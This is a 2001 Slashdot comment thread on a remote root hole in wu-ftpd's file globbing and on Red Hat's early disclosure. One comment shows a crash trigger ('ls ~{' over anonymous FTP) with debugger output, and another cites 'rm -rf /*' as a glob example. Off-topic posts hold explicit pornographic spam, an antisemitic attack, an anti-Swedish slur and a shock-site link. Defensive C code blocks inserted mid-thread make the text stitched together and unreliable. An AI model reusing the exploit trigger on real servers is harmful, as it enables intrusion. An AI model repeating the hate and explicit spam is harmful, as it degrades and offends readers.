Slashdot: News for Nerds

Wu-ftpd Remote Root Hole

michael posted more than 12 years ago | from the taking-anonymous-access-a-little-too-literally dept.

Bug 515

Ademar writes: "A remotely exploitable vulnerability was found in wu_ftp, which is distributed in all major distros. The CERT has a (private) list to coordinate this kind of disclosure so vendors can release updates together, but RH broke the schedule and released their advisory first. You can see the full advisory from securityfocus in bugtraq, but here is a quote: "This vulnerability was initially scheduled for public release on December 3, 2001. Red Hat pre-emptively released an advisory on November 27, 2001. As a result, other vendors may not yet have fixes available."" CNET has a story about this too.

515 comments

(n/t) (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2627982)

So what's wrong with that? (1, Redundant)

shoemakc (448730) | more than 12 years ago | (#2628059)

Further hypocrisy on slashdot....

./ blasts MS whenever they try to keep a known exploit quiet for whatever reason, but then goes ahead and blasts Redhat for spilling the beans.

I thought the whole point of OS was so that you can make changes/fixes yourself? I'd rather go a week without a distro patch, than not know about the exploit at all. At least then I can disable the daemon, or implement a kludge fix.

-Chris

second bukkake post (-1)

dead_puppy (532541) | more than 12 years ago | (#2628071)

As I said earlier on the site that Bukkake is from Japan. The term of Bukkake is not a sexual term at all. After this explanation of bukkake hopefully you will understand why the term is not and why it could be a sexual term and fetish. So let me get on to the explanation of this hot new fetish racing through the American continent.

Bukkake in Japanese is base form of a verb, as it stands alone it is a noun. Bukkake means splash or heavy squirt. This being said let me give you an example of this misunderstood word:

SIMPLE EXAMPLE: Japanese:
boku ha kanojo ni mizu wo bukkaketa.
I her water splashed English:
I splashed her with the water.

When adding something to the end of bukkake such as: ta (makes it past tense) te(command, such as do it) or teru(present) or tai(want to do)

With that being said you could say as well:
SIMPLE EXAMPLE: Japanese:
boku ha kanojo ni mizu wo bukkaketai
I her water want to splash English:
I want to splash her with the water.
Either way you know what bukkake means as a word. believe it or not Japan even has a soup called bukkake udon. That's how much of a normal word it is. This soup has nothing to do with sex at all. It is a soup that Japanese call bukkake because it makes the soup sound more appetizing. They put a lot of vegetables and liquid in the soup, and by calling it bukkake it gives the feeling that the soup was made quickly and its fresh. As if they splashed the soup together. So maybe that will give you more of an insight as to the meaning or feeling of the word as well. Now on the the sexual meaning of it.....
Sexual Definition and History of Bukkake:
Now that you know that bukkake is a term from Japan that means splash, let me tell you why it is a new sexual fetish. Around the late 80's early 90's a couple of video companies were trying to make videos that catered to facial and sperm lovers in Japan. So they decided to make videos that would consist of a girl getting facial after facial over and over again.There are many videos series and companies from Japan that do nothing but bukkake specific videos such as: Soft on Demand, Shuttle, M's video group, Deeps and a few more smaller companies (these videos are hard to find, but do exist). There are also a list of great sites and magazines that show this Japanese bukkake fetish such as: gotcum.com or the magazine Gal's shower. With this information you can do your own research as well as see examples to cure your own curiosity or sexual desire. After these Japanese companies did such extreme facial and cum play videos, pictures and websites; the world caught on like a bon fire in the Evergreen Forest. Now all countries around the world are trying to emulate what the Japanese have done with this new and exciting sexual fetish.There are many American videos out as well other great key players of bukkake media such as Germany or the U.K. Although these countries have tried to emulate the Japanese, nobody does quite like Japan. so far Japan has the most exciting and extreme bukkake out. The Japanese usually have a cute girl sit down in front of a line of up to 200 men. From there she awaits her huge sperm shower. These men repeatedly give her facial after facial. These is where the term bukkake is used because it is like they are splashing her with sperm!! This is not the usual facial you see at the end of a video but rather a shower of facials over and over again on a willing person. This is what makes the fetish a group project rather than just something that two people do together. With this being said, bukkake is not only a fetish but also a sort of orgy. 
If you would like to know the different types of bukkake click here. Now that the fetish on video has blown up so big there are many parties through out the U.S. being thrown by amateurs doing large bukkake parties. You can go to the yahoo groups and find many types of bukkake groups who throw parties all the time. Just do a little research and you are on your way to even being in one of these parties. You could be a giver or a receiver!!! Its up to you and it is no holds barred. So now you know exactly what bukkake means. The true meaning (in the sexual term) is to splash or squirt a large amount of sperm on a girl (or man, if you are gay) This being said you are well on your way to knowing more about this great phenomenon that is bukkake. Go out and have a good time....but please make sure before you do any parties to make sure everyone is tested for STD's (although they say that aids is difficult to pass through saliva or semen) Be sure to use your best judgment, or just join a site or buy videos and be completely safe.

There aren't really a lot of genres of Bukkake, but rather a different way or additions to them. Here is a simple list that I have came across in the past of this style of sex.

Forced Bukkake:
This is were a willing participant acts or seem unwilling to get a facial shower from several men. Bukkake Summit: Here is where a person receives a bukkake shower but tilts their head back and opens their mouth for the full experience, trying to catch it all. At the end of all the facials the cum is collected and drank by the target of the bukkake shower. Costume Play Bukkake: Here is where a party or video is made in a theme setting such as a girl wearing a schoolgirl uniform in a schoolroom. She would sit and suck off each guy in a line waiting. The men repeatedly cum in her mouth or face. Dream Shower Bukkake: This is where the group of men have sex with the target. As one man is having sex the other men watch and cum on the girls face. When the man comes to his climax he cums on her face and the next man in line has sex with her. This one can last a while depending on how many men the target is willing to have sex with.
Snowball or Trade Bukkake: This style of bukkake has two or more targets, which when receive facials swap the cum from mouth to mouth or lick it off of eat others faces. Cum Play Bukkake: Here is where many men cum on the girls face, after which she plays with the cum. Also the men cum on the girls food and the proceeds to eat the food with the sperm glazing.
The genre of Bukkake that I listed above are just a few. There are many more and there are many that are created everyday. You might want to check back to get new ideas on what can be done with bukkake. I will be listing more styles of bukkake in the future.

fp (0, Offtopic)

Anonymous Coward | more than 12 years ago | (#2627986)

Have a nice day!

Re:fp (0)

Anonymous Coward | more than 12 years ago | (#2628116)

You think that's bad, check this [mybc.com] out.

Nice. (1, Flamebait)

Anonymous Coward | more than 12 years ago | (#2627987)

Someone at RedHat's got their business thinking cap on.

Release a fix that no one else is able to yet and tell the world how to exploit the hole.

Crush the competition while they sleep.

Re:Nice. (2, Insightful)

Wells2k (107114) | more than 12 years ago | (#2628002)

Perhaps, but think of it in another way. Redhat is trying to protect their own customers by producing and releasing a fix as soon as possible. The fact that other distributers are falling behind on this mark is truly not their fault.


You don't see Microsoft doing this, do you? :)

Re:Nice. (0)

Anonymous Coward | more than 12 years ago | (#2628012)

Hey, I'm all for crushing competition. Microsoft does it a lot better than other companies.

Re:Nice. (5, Interesting)

dlek (324832) | more than 12 years ago | (#2628028)

According to the CNET article [cnet.com] , Red Hat did this by mistake, and they apologized.

I'm somewhat surprised--but either way it brings the unresolved question of disclosure bubbling to the froth again.

Re:Nice. (5, Troll)

Pxtl (151020) | more than 12 years ago | (#2628048)

Plus, it's pretty bad since whenever Microsoft gets something like this, people get pissed off if they take more than a weekend on it. Here, they took almost a week longer than RedHat, makes you wonder how long this sploit was in hacker circles, and how long the distros knew about it. Whatever happened to the claims of fast reaction in the opensource industry vs. old-skool business?

This isn't a troll, but an honest question - what tookem so long, and why didn't they just throw it open to end-users to protect themselves (like closing down ftps in worst-case) like is supposed to be standard practice?

Re:Nice. (0)

Anonymous Coward | more than 12 years ago | (#2628057)

Redhat utilized sound business thinking instead of subjugating itself to the socialist groupthink typical of the militant Linxen factions. Can't blame them when there are still idiots who argue over the proper usage of "GNU/Linux".

Re:Nice. (0)

Anonymous Coward | more than 12 years ago | (#2628073)

That's not why they did it. They obviously did it to damage the competition. They just opened up a superbig hole in other distributions as soon as they themselves were no longer vulnerable. I just hope that next time it's someone else doing it to them.

Re:Nice. (-1, Flamebait)

Reikk (534266) | more than 12 years ago | (#2628130)

Luckily, most people are not vulnerable to attack due to the fact that their systems have been down now for several days due to filesystem corruption in the kernel.

Linux is written by a bunch of elitist developers who refuse to debug and test their code. Their idea of quality control is releasing software first, then seeing if people who use it have any problems. This "my shit don't stink" elitist attitude will be the fall of Linux.

Down with Linus and all swedish people!

Fuck micheal (-1)

Ralph JewHater Nader (450769) | more than 12 years ago | (#2627991)

He is the worst editor on Slashshit. He is probably Jewish. Burn in hell asshole!

Wu-FTP not in OpenBSD (3, Interesting)

Geekboy(Wizard) (87906) | more than 12 years ago | (#2627992)

Wu-FTP is not in OpenBSD, and ftp is disabled by default. Wu-FTP is not included with all major distributions, but possibly in Linux ones.

You're a nit. You're a nit. Here's another one!

Re:Wu-FTP not in OpenBSD (0)

alexborges (313924) | more than 12 years ago | (#2628047)

BLAM! Offtopic..... Linux is not UNIX (LNU..;)..BSD is...

Re:Wu-FTP not in OpenBSD (0)

Anonymous Coward | more than 12 years ago | (#2628083)

Also, Wu-FTP is not included in MS-DOS, DR-DOS, OS/2 or CP/M.

Re:Wu-FTP not in OpenBSD (0)

Anonymous Coward | more than 12 years ago | (#2628091)

Or goatse.cx [goatse.cx] for that matter.

Re:Wu-FTP not in OpenBSD (1, Funny)

Anonymous Coward | more than 12 years ago | (#2628141)

although it would certainly fit in there

Re:Wu-FTP not in OpenBSD (0)

Anonymous Coward | more than 12 years ago | (#2628162)

Also, wu-ftp was never included in ENIAC, COLOSSUS, or ENIGMA. Even though the Internet gets set back hard by this exploit, Adolf Hitler is safe with a system that makes OpenBSD look like a sieve.

I've changed my mind (5, Interesting)

child_of_mercy (168861) | more than 12 years ago | (#2627996)

Would have been nice to give the maintainers on a few other distro's time to close the hole before broadcasting this to the script kiddies

Until 5 mins ago I was a believer in complete disclosure,

But with 6 wu-ftpd boxes to admin I'm not so sure any more.

Hope I see a fix today.

Re:I've changed my mind (0)

Anonymous Coward | more than 12 years ago | (#2628031)

Until 5 mins ago I was a believer in complete disclosure,
But with 6 wu-ftpd boxes to admin I'm not so sure any more.


More evidence for my theory that everyone in the world is a hypocrite.

Re:I've changed my mind (4, Insightful)

child_of_mercy (168861) | more than 12 years ago | (#2628103)

To paraphrase Keynes:

"When the facts change, I change my mind. What do you do?"


Seriously?

Re:I've changed my mind (2)

compwizrd (166184) | more than 12 years ago | (#2628035)

There WAS a "please contact us at wuftpd so we can co-ordinate", sent out on the 17th, if i got the date right.

Re:I've changed my mind (2)

compwizrd (166184) | more than 12 years ago | (#2628097)

http://www.securityfocus.com/archive/1/241105 is the link, just looked it up. Was on the 19th, close enough.

And what's with the broken counter on replies on slashdot? It claims it was 14 seconds ago that i replied.. I'm sure i didn't find and type the above paragraph, in a mere 14 seconds.

Re:I've changed my mind (0)

Anonymous Coward | more than 12 years ago | (#2628044)

one word:
PROftpd

http://www.proftpd.org

learn it.
use it.
save your self a LOT of time.

-red5

Re:I've changed my mind (1, Informative)

Anonymous Coward | more than 12 years ago | (#2628082)

sorry but the script kiddies had this for weeks now.

Why do you have to be so pompous to think that you are told about an exploit before a baddie has it...

a BADDIE uses it that's how it is discovered nimrod.

Re:I've changed my mind (2, Insightful)

Cato the Elder (520133) | more than 12 years ago | (#2628098)

I haven't.

It's not like only Redhat distro users can now get a safe version of wu_ftpd--it's just that not everyone (necessarily) has the packages ready for all their configurations.

If you have 6 boxes, better start checking versions and installing newer ones. Sure it sucks, but it's better than being surprised when your servers are "owned"

Re:I've changed my mind (4, Flamebait)

andrewski (113600) | more than 12 years ago | (#2628119)

The script kiddies probably knew about this long before CERT did. This is the major problem with private bug lists for vendors; it gives script kiddies a while to continue exploiting boxes while the vendors prepare patches. I would rather know right away, disable FTP, and do without for a few days, than wait until the bug was fixed before I am informed. Private lists, like all other forms of security by obscurity, are inherently ineffective.

Re:I've changed my mind (2)

Schwarzchild (225794) | more than 12 years ago | (#2628163)

That's why I recommend not using WU-FTP. It's full of holes! Like swiss cheese. About as bad as Sendmail. Use something more secure.

first poop (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2628000)

first poop

linuxtoday.com (2, Interesting)

jonsmirl (114798) | more than 12 years ago | (#2628001)

Is this how Linuxtoday was just hacked?

My favorite quote (3, Interesting)

Reality Master 101 (179095) | more than 12 years ago | (#2628003)

The problem, known in security circles as the wu-FTP Globbing Heap Corruption Vulnerability, allows attackers to get remote access to all files on a server, provided they can access the FTP service.

Whew! Your whole system is only wide open if you can access the FTP service. That makes me feel better!

Re:My favorite quote (2)

mattdm (1931) | more than 12 years ago | (#2628046)

That's not so unreasonable. The vast majority of boxes have little reason to run an ftp server -- it should be disabled on most machines anyway. (scp/sftp is a good alternative in many cases, and of course there's always http, which, although there's obviously lots of potential for problems there, at least isn't such a pain with firewalls).

Re:My favorite quote (2)

csbruce (39509) | more than 12 years ago | (#2628077)

Your whole system is only wide open if you can access the FTP service.

That's not a problem to me, as I would never expose an FTP port to the outside world. The FTP protocol is inherently difficult to secure and it has outlasted its usefulness. For outgoing data, you can just use HTTP. And public access for incoming data just means that you will be hosting gigs of ripped movies and porn. FTP should be filtered at the firewall and made available to trusted hosts only.

Re:My favorite quote (0)

Anonymous Coward | more than 12 years ago | (#2628127)

The full paragraph is as follows (my emphasis):

The problem, known in security circles as the wu-FTP Globbing Heap Corruption Vulnerability, allows attackers to get remote access to all files on a server, provided they can access the FTP service. Since most such servers provide anonymous access to anyone on the Internet, a great number will be vulnerable.

They obviously make it clear that most ftp servers are vulnerable. If you are going to be a smart-ass at least say something useful!

just another reason (0)

Anonymous Coward | more than 12 years ago | (#2628005)

just another reason why red hat rocks!

A non-microsoft security bug? (1)

barfy (256323) | more than 12 years ago | (#2628006)

Say it isn't so. A bug that potentially exposes thousands or millions of machines on the net to root access?

Re:A non-microsoft security bug? (1)

kraig (8821) | more than 12 years ago | (#2628053)

not like this hasn't happened with wu before, or sendmail, or bind, or...

Re:A non-microsoft security bug? (0)

Anonymous Coward | more than 12 years ago | (#2628108)

Only those sites whose administrators failed to move away from wu-ftpd (as ANY consultant will tell you).


Just as you should never consider using IIS for an important web server, you should never use wu-ftpd on an important ftp server.

first post??? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2628007)

I claim this post for Queen Elizabeth!!!!!

Red Hat (0)

Anonymous Coward | more than 12 years ago | (#2628008)

It's not surprising that Red Hat would do such a thing.

First reply to mention Microsoft. -1 redundant (0)

Anonymous Coward | more than 12 years ago | (#2628009)


What no snide comment like when a MS exploit is released?

If this was MS, they wouldn't have told us.

etc.

CERT and private lists (5, Interesting)

SClitheroe (132403) | more than 12 years ago | (#2628011)

You all bashed Microsoft the last time around for not immediately and publicly notifying users of an exploit, they, preferring instead to ready a fix before the exploit was common knowledge.

So, once again use an occasion such as this to resoundingly denounce the fact that CERT, and major Linux distros other than Red Hat, have chosen to do essentially the same.

I suspect that the complaints of this type of behavior will be much less in the case of CERT, since Microsoft's disclosure policies simply allow slashdotters to take pot shots at MS, but we'll see...The shoe's on the other foot this time.

Re:CERT and private lists (1)

Wells2k (107114) | more than 12 years ago | (#2628038)

The point here is that, when Microsoft has a fix for something that is broken with their software, they are the only distributers of that software. With WU FTP, there are multiple distributers using the software.

Not that I think Redhat is wrong here. They released a security fix for their software as soon as they could, thus protecting their customer base.

This should have been public knowledge... (3, Insightful)

Brendan Byrd (105387) | more than 12 years ago | (#2628072)

Well, I'll bash MS, and I'll bash the GNU and Linux guys for the same thing. Why was this not released SOONER?

The people who would really use the exploit already know about it in their cracker circles, so why are we limiting the public in this knowledge? Just tell us and we'll shut down the FTPs or temporarily switch the access to a different daemon while you write a patch for it.

Again, this is security by obscurity, and shame on the OSS community for trying to hide it!

Whats ethical? (3, Insightful)

L-Wave (515413) | more than 12 years ago | (#2628016)

This raises the question of ethics, is it more ethical to keep quiet about a hole in software that people run / store important data until its fixed, or is it ethical to tell the public in which case the people affected become "more" vulnerable?

Personally, I would rather be told of the hole, and advised to turn off the daemon, as opposed to running the daemon and not knowing about the hole.....some people think ignorance is bliss.....not me. =)

The customer is always right (2)

KarmaBlackballed (222917) | more than 12 years ago | (#2628160)

Do all hackers notify CERT first? (How many quiet hackers already found this one?)

Once a company has a fix they owe their customers that fix. Anything less is a compromise of their customer's security and risks tarnishing their trust. Yes, getting a fix out first does matter.

Red Hat did the right thing. If your distro has not put out a fix yet, are they working fast enough? (You think there were no script kiddies out there before Red Hat "broke the news?")

Wu-pps (1)

actappan (144541) | more than 12 years ago | (#2628018)

Isn't the whole idea of CERT to prevent someone from leaking out potential dangerous information before everyone is ready to address it? Even if there's a hole - the relative breadth of the knowledge is going to be limited until a public release - and if no one else has caught up yet . . .well then that's bad.

I would condemn RH - but I use their products and I have Wu installed on some of my systems (They're all internal - so don't even think about it). I'm glad I'll have the fix.

Re:Wu-pps (1)

Software (179033) | more than 12 years ago | (#2628085)

I would condemn RH - but I use their products and I have Wu installed on some of my systems (They're all internal - so don't even think about it). I'm glad I'll have the fix.
Don't think that because your systems are internal, they are safe. I'm in charge of administrating about 10 machines, and others in my group each administered about 3. Not one of these machines is accessible outside the company. When Code Red came-a-knocking, guess how many unpatched systems got it? That's right, all of them. People got infected on their home machines, then connected via VPN to the company network and BAM!

I would strongly recommend that anyone running wu-ftpd update their systems ASAP. It sounds like you will. Others won't, and will get rooted.

Redhat (0, Flamebait)

gregRowe (173838) | more than 12 years ago | (#2628019)

Is redhat becoming the MS of Linux distros? That isn't very cool of them to release early. I am sure they were under no obligation to wait but it certainly doesn't seem "polite".

Re:Redhat (2)

Todd Knarr (15451) | more than 12 years ago | (#2628086)

It wouldn't be very cool of them to leave me vulnerable to a break-in when the fix is available. And the fix is available in the wu-ftpd package, regardless of whether the various distributors have packaged it for their systems, so I can install the fix even if my vendor hasn't gotten its act together.

My whole complaint with the non-full-disclosure movement is that vendors under it tend to not acknowledge that security holes exist (which means I can't even do something as simple as disable the vulnerable service until a fix is out) and delay putting patches out (so I'm either vulnerable or off the air longer than needed). I'd be more annoyed at CERT for not reporting the vulnerability than at RedHat for telling me about it.

Re:Redhat (1)

gregRowe (173838) | more than 12 years ago | (#2628105)

Good point. After thinking about it more I agree with you.

Another globbing bug? (2, Flamebait)

Hiro Antagonist (310179) | more than 12 years ago | (#2628024)

AIRC, this type of exploit has been the bane of WuFTPD's existence; one of the reasons I switched to ProFTPD [proftpd.net] some time ago. Much better security history.

Besides; if you're running a public FTP and it's not in a chroot jail, you are a moron anyways.

Example of the bug ... (-1)

Anomymous Coward (303315) | more than 12 years ago | (#2628133)

For everyone who wants to see how it works ...
Simple glob overflow, by adding special characters ( { or [ ) to the end of a request. This provides a way to slip, and execute, shell code onto the heap ... :

ftp> open localhost
Connected to localhost (127.0.0.1).
220 host FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection

1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd: host:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136    in malloc.c


Fun stuff. It's been on the freebsd security list since a few days ago.
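A defensive pre-check for the malformed-pattern case shown in the comment above, as an added example that is not wu-ftpd code and not part of the original post: it rejects a command argument with an unterminated { or [ before any glob expansion sees it. The function names, the length and depth limits, and the reject-on-unclosed policy are assumptions for illustration; the sample commands in main() are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_ARG_LEN     1024  /* assumed policy limit, not a wu-ftpd value */
#define MAX_BRACE_DEPTH 8     /* assumed policy limit */

enum glob_check {
    GLOB_OK = 0,
    GLOB_UNCLOSED_BRACE,      /* '{' never matched by '}' */
    GLOB_UNCLOSED_BRACKET,    /* '[' never matched by ']' */
    GLOB_TOO_DEEP,            /* brace nesting beyond MAX_BRACE_DEPTH */
    GLOB_TOO_LONG             /* argument longer than MAX_ARG_LEN */
};

/* Validate the first len bytes of s. Never reads s[len] or beyond. */
enum glob_check check_glob_n(const char *s, size_t len)
{
    int depth = 0;

    if (len > MAX_ARG_LEN)
        return GLOB_TOO_LONG;

    for (size_t i = 0; i < len; i++) {
        char c = s[i];

        if (c == '\\') {
            i++;                              /* escaped byte is a literal */
        } else if (c == '[') {
            size_t j = i + 1;
            if (j < len && (s[j] == '!' || s[j] == '^'))
                j++;                          /* negated class */
            if (j < len && s[j] == ']')
                j++;                          /* leading ']' is a member */
            while (j < len && s[j] != ']') {
                if (s[j] == '\\')
                    j++;                      /* skip escaped member */
                j++;
            }
            if (j >= len)
                return GLOB_UNCLOSED_BRACKET;
            i = j;                            /* resume after the class */
        } else if (c == '{') {
            if (++depth > MAX_BRACE_DEPTH)
                return GLOB_TOO_DEEP;
        } else if (c == '}' && depth > 0) {
            depth--;                          /* a stray '}' stays literal */
        }
    }
    return depth > 0 ? GLOB_UNCLOSED_BRACE : GLOB_OK;
}

enum glob_check check_glob_arg(const char *s)
{
    return check_glob_n(s, strlen(s));
}

/* Screen one control-channel line. Returns 0 to let it through, or 501
 * (RFC 959: syntax error in parameters or arguments) to refuse it. */
int screen_command(const char *line)
{
    const char *arg = line;

    while (*arg && *arg != ' ' && *arg != '\r' && *arg != '\n')
        arg++;                                /* skip the verb */
    while (*arg == ' ')
        arg++;
    return check_glob_n(arg, strcspn(arg, "\r\n")) == GLOB_OK ? 0 : 501;
}

int main(void)
{
    /* Constructed sample commands, not captured traffic. */
    const char *samples[] = {
        "LIST ~{\r\n",
        "NLST pub/[\r\n",
        "LIST pub/{a,b}/*.tar.gz\r\n",
        "NLST file[0-9].txt\r\n",
    };

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int rc = screen_command(samples[i]);
        printf("%-4s %.*s\n", rc ? "501" : "ok",
               (int)strcspn(samples[i], "\r\n"), samples[i]);
    }
    return 0;
}
```

A refused line is also worth logging with the client address, since a well-behaved FTP client has little reason to send an unterminated pattern.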

Re:Another globbing bug? (5, Interesting)

LS (57954) | more than 12 years ago | (#2628158)

Ok, so what level of security on someone's box makes them no longer a moron? Is there a canonical list of things I must do to secure a box so that I am no longer a moron? To be honest, I run my own box for personal use, and learning anything more than basic security takes more time than it's worth. Please let me know where I can go to learn what it takes to build a secure box as defined by non-moron security experts.

LS

Red Hat's motivations? (0, Flamebait)

code addict (312283) | more than 12 years ago | (#2628025)

The guys at Red Hat sure are jerks. I guess you can always depend on companies to look out for number 1 first, and screw everyone else whenever possible!

Re:Red Hat's motivations? (0)

Anonymous Coward | more than 12 years ago | (#2628079)

So I assume that you prefer your server to be assraped a few more times while you wait for the "popular patch" to be released by a "non-corporate entity". Dumbass.

Repeat of a previous security hole? (1)

Geekboy(Wizard) (87906) | more than 12 years ago | (#2628026)

IIRC, there was a security hole almost exactly like this one in several other FTP servers. Why didn't Wu-FTP (and the distro's) evaluate the code for it then?

Why should they wait? (2)

imrdkl (302224) | more than 12 years ago | (#2628030)

Playing the waiting game with the rest of the crowd could possibly increase Redhat's eventual liability to their own customers, even if it was the right thing to do.

Business is business.

Re:Why should they wait? (1)

Narril Duskwalker (530445) | more than 12 years ago | (#2628070)

Because by not waiting they have given more ammunition to the FUD machine. Maybe not waiting was the best thing for RH, but it certainly wasn't the best thing for linux.

Re:Why should they wait? (0)

Anonymous Coward | more than 12 years ago | (#2628113)

To quote myself, "Fuck the community". Linux is stronger today because one company stepped forward as the standard Linux distribution. It was pure greed and capitalism that brought this to the front, not some vague concept of community or honor or Freedom or any of that other claptrap that the rest of the OS movement wants to lead you to believe in.

The original poster hit it right on the head. Business is business. There isn't any reason to let your competitors compete if it doesn't help you.

Kill them early and kill them quickly.

There is no money to be made catering to your competitors.

Re:Why should they wait? (1)

imrdkl (302224) | more than 12 years ago | (#2628115)

Well, RH is not linux. And neither is WU-FTPD.

that's the beauty.. (2)

Lumpy (12016) | more than 12 years ago | (#2628032)

if you have a clue you can have the fix now.
download the sources and install. simple and effective.

Hiding the fact there is a security flaw only gives the black hats that much more time to use the exploit un-noticed.

It's time to throw out the "leaders" in this industry and start replacing them with men and women with scruples.

Magic Lantern... (2, Offtopic)

cperciva (102828) | more than 12 years ago | (#2628033)

Am I the only person thinking that strategically placed "dumb coding mistakes" might be the real story behind Magic Lantern?

Re:Magic Lantern... (0)

Anonymous Coward | more than 12 years ago | (#2628106)

Yes.

Just like MS. (0)

Anonymous Coward | more than 12 years ago | (#2628039)

I bet that this is how MS feels when people disclose their security holes before a fix.

wu-ftpd has had lots of security issues (1)

GeorgieBoy (6120) | more than 12 years ago | (#2628045)

You should be using ProFTPD [proftpd.net] anyway.

WuFTPD has poor security history (2)

augustz (18082) | more than 12 years ago | (#2628049)

My god, the security history of wu is pretty bad. I wish vendors would ship default network services with an eye towards proven servers that were designed with security in mind.

Wu-ftp/BIND/Sendmail does NOT make me confident.

And quit carping on RedHat, probably just an error, and this bug was reported to ALL the vendors some time ago.

People still trust Wu-ftpd? (4, Informative)

Azar (56604) | more than 12 years ago | (#2628055)

I gave wu-ftpd the boot ages ago. I can't understand why people would still trust this buggy, bloated "just asking for trouble" piece of software. There are better alternatives.

PureFTPD (based on TrollFTPD)
ftpd-BSD (port from OpenBSD)
Virtual FTPD (based on ftpd-BSD)

are all good examples of decent alternatives. I've even heard good things about vsftpd.

Some people (myself not included) even consider ProFTPD to be a viable alternative.

How can people still trust software that has had more holes in it than the finest Swiss Cheese?!

Please Explain, dude(ttes)... (1)

A_Non_Moose (413034) | more than 12 years ago | (#2628058)

Slackware is conspicuously absent from the list, is it not vulnerable? Or just not listed?

The title brought back a question I've had for a while:
the vulnerability: Wu-Ftpd File Globbing Heap Corruption Vulnerability

I've never been able to figure out in layman's terms, much less technical terms, WTF globbing is?

Oh, and while smarter people than I are explaining...the quote at the bottom (the one I see)...what is a Vegemite?
Ever since that Men at Work song, I've wondered.

Re:Please Explain, dude(ttes)... (0)

Anonymous Coward | more than 12 years ago | (#2628094)

Slackware 8.0 comes with ProFTPd instead of wu.ftpd... that's why.

Re:Please Explain, dude(ttes)... (3, Informative)

Anonymous DWord (466154) | more than 12 years ago | (#2628123)

http://www.tuxedo.org/~esr/jargon/html/entry/glob.html

[Unix;common] To expand special characters in a wildcarded name, or the act of so doing (the action is also called `globbing').

Re:Please Explain, dude(ttes)... (2)

Wee (17189) | more than 12 years ago | (#2628136)

I've never been able to figure out in layman's terms, much less technical terms, WTF globbing is?

In real basic terms, to glob is to expand a wildcard character to mean one or more characters. Like if you say something like "sudo rm -rf /*" that asterisk is expanded to mean "zero or more of any character". You might have also seen the question mark used. It means one single character. The Foldoc web site [ic.ac.uk] has a much better explanation.

Oh, and while smarter people than I are explaining...the quote at the bottom (the one I see)...what is a Vegemite? Ever since that Men at Work song, I've wondered.

Vegemite is a nasty product made of yeast extract. It's a brownish paste-like stuff which is spread on bread and the like. An Aussie could probably explain better. I tasted it just once (on a cracker), and that was enough for me.

-B
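
Added example (not part of the thread, and not wu-ftpd's code): a small matcher for the two wildcards described in the comment above, `*` as zero or more characters and `?` as exactly one, expanded against a constructed directory listing. The names `wild_match`, `expand`, `free_matches`, `SAMPLE` and the `MAX_MATCHES` cap are assumptions made for this illustration; the expansion routine puts its result in a defined empty state before any failure path, so cleanup after an error never touches uninitialised memory.

```c
#include <stdio.h>
#include <stdlib.h>

#define MAX_MATCHES 4 /* assumed cap so one pattern cannot expand without bound */
/* Constructed directory listing, not taken from any real server. */
static const char *const SAMPLE[] = {
    "README", "ftpd.c", "ftpd.h", "glob.c", "glob.o", "a.c", "notes.txt"
};
#define SAMPLE_LEN (sizeof SAMPLE / sizeof SAMPLE[0])

struct matches { const char **names; size_t count; };

/* Return 1 if name matches pat: '*' is zero or more characters, '?' is
 * exactly one. Iterative, backtracking to the most recent '*'. */
int wild_match(const char *pat, const char *name)
{
    const char *star = NULL, *resume = NULL;
    while (*name) {
        if (*pat == '*') { star = pat++; resume = name; }
        else if (*pat == '?' || *pat == *name) { pat++; name++; }
        else if (star) { pat = star + 1; name = ++resume; }
        else return 0;
    }
    while (*pat == '*') pat++;
    return *pat == '\0';
}

/* Safe on an empty result, so every error path can clean up the same way. */
void free_matches(struct matches *m)
{
    free(m->names);
    m->names = NULL;
    m->count = 0;
}

/* Expand pat against listing[0..n). Returns 0, or -1 on an empty pattern,
 * allocation failure or more than MAX_MATCHES hits; *out is empty on failure. */
int expand(const char *pat, const char *const *listing, size_t n, struct matches *out)
{
    out->names = NULL; /* defined state before any failure path */
    out->count = 0;
    if (pat == NULL || *pat == '\0')
        return -1;
    out->names = calloc(MAX_MATCHES, sizeof *out->names);
    if (out->names == NULL)
        return -1;
    for (size_t i = 0; i < n; i++) {
        if (!wild_match(pat, listing[i]))
            continue;
        if (out->count == MAX_MATCHES) { free_matches(out); return -1; }
        out->names[out->count++] = listing[i]; /* borrowed, not copied */
    }
    return 0;
}

int main(void)
{
    struct matches m;
    int rc = expand("*.c", SAMPLE, SAMPLE_LEN, &m);
    for (size_t i = 0; i < m.count; i++)
        puts(m.names[i]);
    free_matches(&m);
    return rc == 0 ? 0 : 1;
}
```

Shell globbing has more rules than this (bracket sets, brace and tilde expansion, hidden files); the sketch covers only the two wildcards the comment names.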

Re:Please Explain, dude(ttes)... (1)

captin nod (517564) | more than 12 years ago | (#2628140)


Vegemite [vegemite.com.au] is a traditional aussie sandwich spread extracted from the yeasty remains left over from making beer.

some people love it, some people hate it.

Slackware uses ProFTPd (0)

Anonymous Coward | more than 12 years ago | (#2628147)

Slackware ships with ProFTPd, if i remember correctly...

Why use Wu-ftpd (2, Informative)

niekze (96793) | more than 12 years ago | (#2628061)

